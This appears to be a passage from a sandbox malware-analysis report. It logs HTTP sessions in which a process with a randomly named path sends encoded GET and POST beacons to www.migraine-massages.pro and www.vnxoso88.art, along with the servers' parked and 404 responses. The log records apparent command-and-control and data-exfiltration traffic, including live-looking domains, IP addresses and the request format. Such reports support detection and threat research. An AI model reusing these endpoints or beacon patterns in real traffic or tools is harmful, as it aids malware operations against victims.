                                                                                        8           192.168.2.8  49716        199.59.243.227  80                5188  C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp                           Bytes transferred  Direction  Data
                                                                                        Nov 6, 2024 16:00:15.264066935 CET  387                OUT        GET /ym43/?A60d=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRotDS7tV9/yFnz3DJaYsKbhs+4gmff4HURwuAtNrFLN6oA==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.migraine-massages.pro
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:00:15.881442070 CET  1236               IN         HTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:15 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1510
                                                                                        x-request-id: 6120e4ee-e090-41ef-928b-b3da0e74cbc7
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hD3xPYOyKBhdbmq3AutkMnyIYATMWmcRot6NJVPRW61hrtbgJrfx3YRx0int4qKyo+oWLk9tl5tjMKhKKaBnuQ==
                                                                                        set-cookie: parking_session=6120e4ee-e090-41ef-928b-b3da0e74cbc7; expires=Wed, 06 Nov 2024 15:15:15 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hD3xPYOyKBhdbmq3AutkMnyIYATMWmcRot6NJVPRW61hrtbgJrfx3YRx0int4qKyo+oWLk9tl5tjMKhKKaBnuQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Nov 6, 2024 16:00:15.881495953 CET  963                IN
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjEyMGU0ZWUtZTA5MC00MWVmLTkyOGItYjNkYTBlNzRjYmM3IiwicGFnZV90aW1lIjoxNzMwOTA1Mj


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                        9           192.168.2.8  49717        66.29.146.14    80                5188  C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp                           Bytes transferred  Direction  Data
                                                                                        Nov 6, 2024 16:00:20.960102081 CET  633                OUT        POST /d26j/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vnxoso88.art
                                                                                        Origin: http://www.vnxoso88.art
                                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Ascii: A60d=/R1zs/iKmff+GS+xOFOV2DdFXlA90jsiUTNVUjbWw6l3BfUPMuTVfbmwHXY/2bqEZhYVK/NGoQ4hJkdy9dtk2W12MxZ2I39O/7EpNjhcWhRUYphmXZR3EhdsEnrmcnUUa8kjgvqPsRtObRaS9rBH6U7wlhETtWqL28t0VkqrSr0Ue70ZHZc9tyaruB9/uz3O9u+9oTE=
                                                                                        Nov 6, 2024 16:00:21.665828943 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                        keep-alive: timeout=5, max=100
                                                                                        content-type: text/html
                                                                                        transfer-encoding: chunked
                                                                                        content-encoding: gzip
                                                                                        vary: Accept-Encoding
                                                                                        date: Wed, 06 Nov 2024 15:00:21 GMT
                                                                                        server: LiteSpeed
                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                        connection: close


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                        10          192.168.2.8  49718        66.29.146.14    80                5188  C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp                           Bytes transferred  Direction  Data
                                                                                        Nov 6, 2024 16:00:23.501157045 CET  653                OUT        POST /d26j/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vnxoso88.art
                                                                                        Origin: http://www.vnxoso88.art
                                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 52 33 42 36 77 50 4e 76 54 56 65 62 6d 77 4d 33 5a 31 79 62 71 4e 5a 68 55 6e 4b 39 5a 47 6f 51 73 68 4a 6d 31 79 39 75 56 6e 30 47 31 77 5a 42 5a 30 56 6e 39 4f 2f 37 45 70 4e 6a 45 35 57 68 5a 55 62 5a 78 6d 52 49 52 32 59 52 64 76 54 58 72 6d 59 6e 55 51 61 38 6b 56 67 75 32 70 73 53 5a 4f 62 56 65 53 39 2b 31 41 30 55 37 32 34 78 46 79 6f 7a 54 63 33 73 39 6a 49 48 79 34 53 39 6f 56 66 4e 46 7a 64 37 55 37 75 79 79 41 75 43 56 4a 72 45 71 6d 6e 4e 75 4e 32 45 51 58 77 48 4e 6c 68 57 65 4f 6a 72 4f 4d 55 7a 33 68 7a 38 41 77
                                                                                        Data Ascii: A60d=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJR3B6wPNvTVebmwM3Z1ybqNZhUnK9ZGoQshJm1y9uVn0G1wZBZ0Vn9O/7EpNjE5WhZUbZxmRIR2YRdvTXrmYnUQa8kVgu2psSZObVeS9+1A0U724xFyozTc3s9jIHy4S9oVfNFzd7U7uyyAuCVJrEqmnNuN2EQXwHNlhWeOjrOMUz3hz8Aw
Nov 6, 2024 16:00:24.157623053 CET | 1236 | IN | HTTP/1.1 404 Not Found
keep-alive: timeout=5, max=100
content-type: text/html
transfer-encoding: chunked
content-encoding: gzip
vary: Accept-Encoding
date: Wed, 06 Nov 2024 15:00:24 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
connection: close
                                                                                        Data Raw: 31 33 34 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                        Data Ascii: 134BZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
Nov 6, 2024 16:00:24.157656908 CET | 1236 | IN | Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
Nov 6, 2024 16:00:24.157676935 CET | 1236 | IN | Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                        Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
Nov 6, 2024 16:00:24.157687902 CET | 1236 | IN | Data Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                                        Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
Nov 6, 2024 16:00:24.157706976 CET | 287 | IN | Data Raw: ed 86 f9 6e 00 ff 84 fc 95 50 d7 77 ca 9f c8 72 cd fe 2d 52 3f 83 d3 9f 5e f0 f4 e7 4f 95 70 91 f3 bd 09 af 37 7a 1e fe 23 45 01 2d be 93 fd 59 43 77 df 1e e1 cf 56 3d c2 1f 59 e5 06 47 1f f0 75 15 09 5e 59 7c 7c ae e0 bd d7 f3 2f 83 ea d5 b7 fb
                                                                                        Data Ascii: nPwr-R?^Op7z#E-YCwV=YGu^Y||/[0q_*v /3?8SJs&(>pu<$CO@L(Yn~l-=a:{"}c@}`g7y


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49719 | 66.29.146.148 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:00:26.047923088 CET | 1670 | OUT | POST /d26j/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1241
Cache-Control: max-age=0
Connection: close
Host: www.vnxoso88.art
Origin: http://www.vnxoso88.art
Referer: http://www.vnxoso88.art/d26j/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 4a 33 42 49 34 50 4d 4d 37 56 45 62 6d 77 46 58 5a 30 79 62 72 66 5a 68 64 75 4b 39 56 57 6f 56 6f 68 49 48 56 79 31 2f 56 6e 2b 47 31 77 62 42 5a 35 49 33 38 4d 2f 37 55 31 4e 6a 55 35 57 68 5a 55 62 62 35 6d 48 70 52 32 4c 42 64 73 45 6e 72 71 63 6e 55 38 61 38 38 46 67 75 79 6d 73 42 42 4f 62 31 4f 53 2f 4d 74 41 38 55 37 30 37 78 46 51 6f 7a 57 62 33 73 67 61 49 45 75 57 53 36 45 56 66 72 55 46 45 34 6b 74 30 67 75 4b 67 46 4e 74 76 31 47 73 67 4f 57 51 38 6d 38 4a 35 52 70 4d 72 47 4b 77 68 4a 37 61 4c 57 7a 48 37 73 39 75 76 66 30 35 36 42 53 35 34 77 72 69 65 69 53 56 48 7a 72 44 2b 7a 6d 45 66 37 61 43 6f 6e 57 46 30 49 6b 54 67 59 41 75 4d 45 52 35 30 68 65 53 54 55 44 4d 47 68 75 56 79 33 4e 77 4c 6a 30 36 78 2b 67 4b 67 41 54 63 56 32 76 79 71 69 6b 44 55 7a 68 65 58 39 50 57 75 5a 44 74 74 71 49 5a 48 38 67 56 7a 45 51 57 33 67 49 4f 6a 70 47 35 42 [TRUNCATED]
                                                                                        Data Ascii: A60d=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJJ3BI4PMM7VEbmwFXZ0ybrfZhduK9VWoVohIHVy1/Vn+G1wbBZ5I38M/7U1NjU5WhZUbb5mHpR2LBdsEnrqcnU8a88FguymsBBOb1OS/MtA8U707xFQozWb3sgaIEuWS6EVfrUFE4kt0guKgFNtv1GsgOWQ8m8J5RpMrGKwhJ7aLWzH7s9uvf056BS54wrieiSVHzrD+zmEf7aConWF0IkTgYAuMER50heSTUDMGhuVy3NwLj06x+gKgATcV2vyqikDUzheX9PWuZDttqIZH8gVzEQW3gIOjpG5BSm+T/2up97WJtIRBMN4gWnu93PsaeOCjmBBPF1OZFqRSF881VxCH9RwOXJotPk0i4xu33NvG5VUAnhxdQ1N+q7hAxAo+EmuN5y3KpNOnsR5Z2UoI+PgvboYvk9U2zbLS6ZN8l4Qf3j0wmncgyJW/PR9dCRmK5+OjVY+kUF7KMk2hTZ2pwjh9r6zWEPPRaCHy/FEXSQvOpEMbJuZ9FhQsWy7Dvzrd38/l8HOtNpxMwAwuYNCKE22eHKdATVK5AInzL9dO9FIH2SAH1xmuc6HYS5W8prDlsD/eGRePG7kVhrPLdv/sat6ELQD8leCr2f+ds/PyVnxrcOgrg3CvOcAyZSLMKulQJ35I+VfrUe7QpQYPyin6UN4ZMDv0iDGaHVBRtklRqeAAAY3JJEFi9th5xnROSSKRagmSsutku1mqcCSdZjdDYQw+qHS6Vg7OKcrMIdMAUwWxpXvmFCPZ/yvkNUJ3g81myDWZL/bhMs91amOOgiBqoR5C2dak614LFyByVxfxl3SeZbBXxXGz1Efybmbw1VamSeV2bz7csMhc8ObzqJXTTEKPtPzzXwkn2L+Atkou6uLhqtcF49Z1Rf0S3lBiLGUWD2ANYVnJZjJiogFHB4qHVuwP8cEdCxmgWGo0azQDbZOG76xySzkDFv8tiUnW/6g6a2GVVo [TRUNCATED]
Nov 6, 2024 16:00:26.714097023 CET | 1236 | IN | HTTP/1.1 404 Not Found
keep-alive: timeout=5, max=100
content-type: text/html
transfer-encoding: chunked
content-encoding: gzip
vary: Accept-Encoding
date: Wed, 06 Nov 2024 15:00:26 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
connection: close
                                                                                        Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 22 44 4d 55 cf 68 43 12 20 21 09 04 08 87 e3 86 d0 8e 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 da b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e [TRUNCATED]
                                                                                        Data Ascii: 134CZJvL"DMUhC !V's=pB<w?qve o=|3q+{XV)w]vtOXv,"fv?BGV]nyyG=6jZ:UMh/0K'wRUX7!JV&Y:s*^o/^9~$O~nUh[_[_~\Vgay~0S>pC?W#g-;^`8+]icpXn9N*0}/]=FNXt3;?k?hvg&cZ*{pd$giWZ^VVU:{g_huZe~^!8.r}nY o}(n6|8Bkl7r=W3_w8MM.mJ[Oua&H~p0}s1qCa&l+,&UCo{0!- ~WxWt k_x2.?@in=&15}d_Pc%f/i|*C7{CrwMZSY_}d|V68!7~v$\>a} 5w>)$[};oRzGYF"?V'KR=Y6$|?Lo-t&@N[\p OKZ/G;
Nov 6, 2024 16:00:26.714118958 CET | 212 | IN | Data Raw: 02 25 f0 37 33 bc f1 f3 b7 c4 75 42 6b f0 a7 04 04 d2 17 c3 8c 48 2a ef fe 7c b3 cd 2d 6a 6f 86 7b e5 e5 59 79 c9 50 0f 83 c2 8d 41 ac 6b 6e 1c b0 9f d3 47 2c e0 3f ed c3 20 08 1d c7 4d df 58 ea 47 fb 76 95 9f 2e c8 7e f6 eb f7 f3 de d8 ef 57 dc
                                                                                        Data Ascii: %73uBkH*|-jo{YyPAknG,? MXGv.~Wa'~K$PSy\pC{Ov=}K;c#,{tRz2}GH}/>7y!$E`c
Nov 6, 2024 16:00:26.714215994 CET | 1236 | IN | Data Raw: f7 33 de 9c cb da 97 59 5c 57 1f 38 d7 cb 61 fc 2a 7e f4 2b fb f6 7a bc f9 60 e8 55 24 e4 e6 9c de 2f bb 51 ce cb 81 fb d9 fa 1f 00 e8 26 5f 7f 66 f8 37 aa 1f 04 9f f1 18 a8 f6 7f 11 7c 7e 0c 1b 75 11 ff c9 b1 2a eb e1 12 46 e0 3c f5 ff b2 b7 4a
                                                                                        Data Ascii: 3Y\W8a*~+z`U$/Q&_f7|~u*F<J$kfL34ei_jYZ;NS'h!/{$?2CYR[}^4[mj:D7YB:b@R:LY#l93+p8-T'KvG+
Nov 6, 2024 16:00:26.714227915 CET | 1236 | IN | Data Raw: f3 0e a3 2c 14 7a ac 2c 36 26 df d6 c7 21 41 07 aa db e1 8a 25 69 f3 56 94 24 2d d6 22 75 df 96 fa 24 77 12 67 0f 07 1c b5 5a 72 6c bb 62 6a 6a 83 23 e5 52 0a 97 23 80 98 76 37 62 7d da e5 0e b1 25 8f a3 8a e6 10 48 ee 5a 70 39 4d 6d cb 95 25 67
                                                                                        Data Ascii: ,z,6&!A%iV$-"u$wgZrlbjj#R#v7b}%HZp9Mm%g.qFB\L^m>4n3N=7XO9a6"8jja+;E>rfTiN]OvVZ,b ZkBp;nacv!oAYc!ZZ+Gek~?
Nov 6, 2024 16:00:26.714237928 CET | 424 | IN | Data Raw: 83 68 d4 e5 a8 4c d6 01 25 89 6b 41 6a a7 d5 fc 34 aa 15 52 75 e1 96 4e 0b a6 5b a4 b4 75 92 96 f3 4d a4 51 6d c6 cc 4e 3a 04 39 c6 aa ac f9 19 34 a7 72 8c e1 08 4f 70 4a ef 18 74 82 b6 d2 76 71 2d 1a f3 6d a1 97 e0 70 c5 f0 c8 c2 3f 4b 71 61 e9
                                                                                        Data Ascii: hL%kAj4RuN[uMQmN:94rOpJtvq-mp?KqaT1&5Pr<Cj2P IW;:@.7&v 3MAh\3 C},8MkW0[s*vs,:)$Jxs"+qhEKbhK[;xa~PER
Nov 6, 2024 16:00:26.714268923 CET | 888 | IN | Data Raw: 5e d2 68 b5 1a 53 b0 b0 b3 9c c6 c3 c6 42 a7 9a 6a 30 4e 21 f9 40 d7 ba e2 c3 a2 4d 6c cc 84 da 1c 56 48 4e 33 0a 33 da 44 f4 9e 42 a3 33 e5 f1 d9 50 b1 90 82 d6 4c 83 9a 69 fc 06 e4 be 88 b6 2c 2f d5 d5 70 cb 0b a2 ca b2 7b 3b ed f2 40 e2 55 35
                                                                                        Data Ascii: ^hSBj0N!@MlVHN33DB3PLi,/p{;@U5xJ-8Rmz;p[[)08(ZLfC?=ne?z;+=~+Z7ZKE|?w>:a3c,X^/s@=T^+L}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49720 | 66.29.146.148 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:00:28.603564978 CET | 378 | OUT | GET /d26j/?A60d=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3m5Pan90DEVx2dAgRBkFBhEuf5ZPCqUAEh8OTzHmZFBqDA==&QftlZ=CnaPg8j HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.vnxoso88.art
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 6, 2024 16:00:29.261261940 CET | 1236 | IN | HTTP/1.1 404 Not Found
keep-alive: timeout=5, max=100
content-type: text/html
transfer-encoding: chunked
date: Wed, 06 Nov 2024 15:00:29 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
connection: close
                                                                                        Data Raw: 32 37 37 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                        Data Ascii: 2775<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Nov 6, 2024 16:00:29.261280060 CET | 212 | IN | Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                        Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info {
Nov 6, 2024 16:00:29.261300087 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20
                                                                                        Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0;
Nov 6, 2024 16:00:29.261312962 CET | 1236 | IN | Data Raw: 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20
                                                                                        Data Ascii: fo-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img {
Nov 6, 2024 16:00:29.261339903 CET | 424 | IN | Data Raw: 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b
                                                                                        Data Ascii: er address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
